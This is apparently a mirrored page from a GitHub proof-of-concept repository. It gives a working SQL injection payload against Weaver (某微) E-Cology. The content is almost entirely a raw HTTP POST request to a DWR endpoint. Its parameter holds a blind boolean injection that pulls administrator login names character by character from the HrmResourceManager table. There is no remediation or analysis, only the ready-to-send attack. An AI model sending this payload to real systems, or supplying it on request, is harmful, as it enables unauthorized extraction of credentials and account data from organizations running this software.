POC/某微-E-Cology-某版本-SQL注入漏洞.md at bd815dacaaa4b808c9d1180bf0ef69055da38caa

admin/POC

mirror of https://github.com/eeeeeeeeee-code/POC.git synced 2025-08-12 02:57:09 +00:00

eeeeeeeeee-code 06c8413e64 first commit

2025-03-04 23:12:57 +08:00

705 B

Raw Blame History

某微 E-Cology 某版本 SQL注入漏洞

POST /dwr/call/plaincall/DocDwrUtil.ifNewsCheckOutByCurrentUser.dwr HTTP/1.1
Host: ip
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36
Content-Length: 191
Accept-Encoding: gzip
Connection: close
Content-Type: text/plain
 
callCount=1
page=
httpSessionId=
scriptSessionId=
c0-scriptName=DocDwrUtil
c0-methodName=ifNewsCheckOutByCurrentUser
c0-id=0
c0-param0=string:1 and ascii((select substring(loginid,1,1)from HrmResourceManager))=115
c0-param1=string:1
batchId=0

705 B Raw Blame History

某微 E-Cology 某版本 SQL注入漏洞

705 B

Raw Blame History